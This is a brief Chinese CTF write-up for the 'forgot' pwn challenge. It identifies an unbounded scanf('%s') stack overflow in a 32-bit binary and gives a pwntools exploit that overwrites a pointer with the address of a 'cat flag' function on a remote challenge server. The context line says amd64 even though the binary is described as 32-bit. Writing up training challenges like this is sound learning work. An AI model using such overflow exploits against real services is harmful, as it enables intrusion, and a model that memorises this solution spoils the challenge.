forgot
发现是32位文件
fgets(s, 32, stdin)限制读入32位字符,无法利用
__isoc99_scanf("%s", v2) 典型的栈溢出
发现cat flag
覆盖v2-v3,覆盖为cat flag的函数地址
exp:
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
